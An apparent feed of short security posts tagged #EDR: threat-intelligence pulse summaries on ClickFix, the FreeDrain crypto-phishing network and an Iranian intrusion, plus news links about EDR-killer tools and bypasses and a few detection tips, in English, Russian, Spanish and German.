Caught in the CAPTCHA: How ClickFix is Weaponizing Verification Fatigue to Deliver RATs & Infostealers

Threat actors are exploiting user fatigue with anti-spam mechanisms through a technique called ClickFix. This method involves compromising websites and embedding fraudulent CAPTCHA images, which, when solved by unsuspecting users, lead to the execution of malicious code. The attack chain typically includes PowerShell commands and the use of legitimate Windows tools to download and execute additional payloads. Common malware delivered through this technique includes Lumma Stealer, NetSupport RAT, and SectopRAT. The success of ClickFix relies heavily on social engineering and user interaction, making user education and awareness crucial in mitigating these attacks. Recommendations include training users to recognize suspicious requests, restricting PowerShell execution, and deploying advanced EDR solutions.

Pulse ID: 682f9d00cee548c073778038
Pulse Link: https://otx.alienvault.com/pulse/682f9d00cee548c073778038
Pulse Author: AlienVault
Created: 2025-05-22 21:54:08

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CAPTCHA #CyberSecurity #EDR #Education #InfoSec #InfoStealer #LummaStealer #Malware #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #PowerShell #RAT #SMS #SocialEngineering #Spam #Windows #bot #AlienVault

2025 Ransomware Trends You Need to Know

Ransomware isn’t slowing down—in fact, it’s evolving faster than ever in 2025. Watch our new video for details on ransomware trends, including:

🔹 AI-powered ransomware that evolves faster than defenders can keep up
🔹 A surge in rookie attackers using leaked playbooks and dark web kits
🔹 The 2025 must-have proactive prevention strategies

Watch now for the details! https://youtu.be/r4_ePm3swE0

#Cybersecurity #Cyberaware #Ransomware #RansomwareTrends #AIThreats #EDR #XDR #SupplyChainSecurity

Hunting hidden threats in your network? 🕵️ Learn to master EDR threat hunting by building custom detection rules! Our new article dives deep into leveraging EDR for proactive cybersecurity. Level up your defenses! 🚀 #EDR #threatHunting #cybersecurity

http://bytesectorx.blogspot.com/2025/05/advanced-threat-hunting-with-edr.html

#Ransomware crews add '#EDR killers' to their arsenal – and some aren't even malware
Criminalss are disabling #security tools early in attacks, Talos says
Ransomware crews are increasingly using programs like #EDRSilencer, #EDRSandblast, #EDRKillShifter, and Terminator to either modify or completely disable endpoint detection and response (EDR) products.
https://www.theregister.com/2025/03/31/ransomware_crews_edr_killers/

Unmasking the FreeDrain Network

A collaborative investigation by Validin and SentinelLABS exposes the FreeDrain Network, a large-scale cryptocurrency phishing operation. The campaign exploits search engine optimization, free web services, and redirection techniques to target and drain cryptocurrency wallets. The attackers use lure pages hosted on trusted platforms, which redirect victims to phishing sites mimicking legitimate wallet interfaces. The operation is believed to be run by individuals in the IST timezone, working standard business hours. The campaign has been active since at least 2022, with a notable acceleration in mid-2024. The research highlights the need for stronger safeguards on free publishing platforms to prevent such large-scale abuse.

Pulse ID: 681d25f00b6ceeb219d19c9a
Pulse Link: https://otx.alienvault.com/pulse/681d25f00b6ceeb219d19c9a
Pulse Author: AlienVault
Created: 2025-05-08 21:45:20

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #EDR #InfoSec #Mimic #OTX #OpenThreatExchange #Phishing #RAT #Rust #SentinelLabs #bot #cryptocurrency #AlienVault

FreeDrain Unmasked | Uncovering an Industrial-Scale Crypto Theft Network

FreeDrain is a sophisticated, large-scale cryptocurrency phishing operation that has been stealing digital assets for years. It exploits search engine optimization, free-tier web services, and layered redirection techniques to target cryptocurrency wallets. Victims are lured through high-ranking search results to phishing pages that mimic legitimate wallet interfaces. The operation has been linked to over 38,000 distinct subdomains hosting lure pages. Evidence suggests the operators are based in the UTC+05:30 timezone, likely in India, working standard weekday hours. The campaign highlights systemic weaknesses in free publishing platforms and the need for stronger safeguards, user education, and security community collaboration to combat such threats.

Pulse ID: 681e194bee59e1953f5a22e8
Pulse Link: https://otx.alienvault.com/pulse/681e194bee59e1953f5a22e8
Pulse Author: AlienVault
Created: 2025-05-09 15:03:39

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #EDR #Education #India #InfoSec #Mimic #OTX #OpenThreatExchange #Phishing #RAT #bot #cryptocurrency #AlienVault

This is actually a pretty smart and simple trick, abusing the update process.

This is another one where now that someone has thought of it, I'm surprised no one thought of this angle sooner.

https://cybersecuritynews.com/threat-actor-bypass-sentinelone-edr/amp/

#security #attacks #EDR #ransomware

New "Bring Your Own Installer" #EDR bypass used in #ransomware attack

https://www.bleepingcomputer.com/news/security/new-bring-your-own-installer-edr-bypass-used-in-ransomware-attack/

#cybersecurity

Investigating Iranian Intrusion into Strategic Middle East Critical Infrastructure

This report details a prolonged Iranian state-sponsored intrusion into critical national infrastructure in the Middle East from May 2023 to February 2025. The threat actors employed various tactics including web shells, custom malware, and legitimate tools to maintain persistent access across multiple network segments. Key findings include the use of novel malware families like HanifNet and NeoExpressRAT, as well as extensive credential harvesting and lateral movement techniques. The intrusion demonstrated sophisticated evasion capabilities and targeted attempts to access operational technology networks. Forensic analysis revealed potential links to previously reported Iranian APT campaigns. The report provides detailed technical indicators and recommends enhanced logging, EDR deployment, and multi-factor authentication to defend against similar threats.

Pulse ID: 681a66fd8309a0fad22d97ae
Pulse Link: https://otx.alienvault.com/pulse/681a66fd8309a0fad22d97ae
Pulse Author: AlienVault
Created: 2025-05-06 19:46:05

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CredentialHarvesting #CyberSecurity #EDR #ICS #InfoSec #Iran #Malware #MiddleEast #OTX #OpenThreatExchange #OperationalTechnology #RAT #bot #AlienVault

New 'Bring Your Own Installer (#BYOI)' technique allows to bypass #EDR
https://securityaffairs.com/177494/hacking/new-bring-your-own-installer-byoi-technique-allows-to-bypass-edr.html
#securityaffairs #hacking

EDR для Windows. Основы, архитектура, принципы работы

В предыдущих статьях,( 1 , 2 , 3 ) цикла, посвященного сбору событий в ОС Windows и Linux, мы рассмотрели, какие типы источников событий важны для мониторинга с точки зрения обеспечения информационной безопасности, а также каким образом осуществляется сбор и отправка соответствующий событий в системы мониторинга, в т.ч. был рассмотрен сбор событий с помощью агентов.

https://habr.com/ru/companies/securityvison/articles/905842/

#информационная_безопасность #аудит_событий #edr #антивирусы

Emerging Phishing Techniques: New Threats and Attack Vectors

This analysis delves into four sophisticated phishing techniques observed in 2025. These include embedding Base64-encoded JavaScript in SVG files, hiding malicious URLs in PDF annotations, using OneDrive links to deliver dynamic phishing content, and nesting MHT files within OpenXML documents. These methods successfully evaded email protections and reached intended victims, demonstrating the increasing sophistication of threat actors. The techniques exploit unconventional file formats, cloud-based platforms, and structural obfuscation to bypass traditional security measures. The findings emphasize the need for improved detection mechanisms, deeper inspection of file structures, and advanced context-aware parsing in email and document security tools.

Pulse ID: 680fac676d706a8fdbc062ab
Pulse Link: https://otx.alienvault.com/pulse/680fac676d706a8fdbc062ab
Pulse Author: AlienVault
Created: 2025-04-28 16:27:19

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Cloud #CyberSecurity #EDR #Email #InfoSec #Java #JavaScript #OTX #OpenThreatExchange #PDF #Phishing #RAT #SMS #SVG #bot #AlienVault

Dificultad para bypassear EDRs: perspectiva de un operador de ransomware #antivirus #edr #evasion #maldev #malware #noticias #ransomware
https://www.hackplayers.com/2025/04/dificultad-para-bypassear-edrs.html

This is a really nice write up from Sekoia with lots of #ThreatDetection details, regardless of the #EDR you're using.

🔎 Of particular note, this attack is aided with a .LNK file pulling in a .HTA via a remote location.

🕵🏼‍♂️ Detect .LNK files making external connections, they are particularly easy to tune.

🕵🏼‍♂️ Detect mshta.exe running suspicious executables (i.e. cmd.exe).

Happy #ThreatHunting

🔗 https://blog.sekoia.io/detecting-multi-stage-infection-chains-madness/

Chinese APTs Exploit EDR 'Visibility Gap' for Cyber Espionage
https://www.darkreading.com/threat-intelligence/chinese-apt-exploit-edr-visibility-gap-cyber-espionage

#Infosec #Security #Cybersecurity #CeptBiro #ChineseAPT #Exploit #EDR #VisibilityGap #CyberEspionage

#EDR-as-a-Service makes the headlines in the #cybercrime landscape
https://securityaffairs.com/176266/cyber-crime/edr-as-a-service-edr-cybercrime.html
#securityaffairs #hacking

Da vértigo ver el nivel de organización de estos #RaaS (servicios de #ransomware ). Gracias a la gente de @ESETresearch por ofrecernos su informe sobre #ransomHub y los #EDR killer : https://www.welivesecurity.com/es/investigaciones/edrkillshifter-ransomhub-grupos-rivales/

Staying ahead means staying informed, right? Here's our latest wrap of the day's Cyber News:

🗞️ https://opalsec.io/daily-news-update-thursday-april-3-2025-australia-melbourne/

If you're short on time, here’s a quick whip-around of the top 3 stories of note:

🕵️‍♂️ Hunters Ransomware Rethink: Is the heat getting too much? Hunters International leadership reportedly told affiliates ransomware is now too "risky," planning a shift to pure data theft/extortion under a "World Leaks" banner. While their current status is murky, this potential pivot away from encryption echoes moves by other groups and highlights how defensive pressures are forcing attacker evolution – something we all need to track.

📧 White House OpSec Woes: Remember that recent White House Signal mishap? Well, now the same National Security Adviser is reportedly facing heat for using personal Gmail for sensitive (if unclassified) government discussions, raising serious OpSec and compliance alarms. It's a potent reminder for us all: even seemingly benign comms on personal platforms can create significant risks, and basic security hygiene is non-negotiable, especially when sensitive info is involved.

📞 Verizon API Call Log Leak: Here’s a worrying find: a simple API flaw in Verizon's Call Filter app exposed the incoming call history of potentially all their wireless customers to each other. Technically, it was a textbook case of broken object-level authorization – the API didn't check if the user's token matched the phone number whose logs were requested in a header. This highlights the critical need for robust API authorization checks and the significant privacy impact even call metadata can have.

Have a read of the full newsletter, and sign up to get all the details straight to your inbox each day:

📨 https://opalsec.io/daily-news-update-thursday-april-3-2025-australia-melbourne/#/portal/signup

#CyberSecurity #InfoSec #ThreatIntel #Ransomware #DataBreach #DataLeak #Vulnerability #APIsecurity #CloudSecurity #SupplyChainSecurity #Malware #Privacy #CyberAttack #InfoSecNews #ThreatHunting #CISCO #Verizon #GitHub #NationalSecurity #AndroidSecurity #EDR #CyberAwareness

IT-Sicherheitsmonitoring – 26 sinnvolle Maßnahmen zur Erkennung kritischer IT-Vorgänge

Ich habe eine umfassende und praxisnahe Übersicht zur Orientierung erstellt – mit konkreten Schwellenwerten, Bedingungen und Tool-Kategorien:
➡️ Benutzeranomalien
➡️ Systemveränderungen
➡️ Netzwerkanomalien
➡️ Ransomware-Indikatoren
➡️ Canary Files, LSASS-Zugriffe, PowerShell-Analyse
➡️ Backup- & GPO-Schutz u. v. m.

https://kommunaler-notbetrieb.de/empfehlungen/it-sicherheitsmonitoring/

#ITSicherheit #Kommunen #Monitoring #Detektion #EDR #SIEM

Cómo evadir detecciones con ofuscación en la línea de comandos #edr #evasion #herramientas #técnicas
https://www.hackplayers.com/2025/03/como-evadir-detecciones-con-ofuscacion.html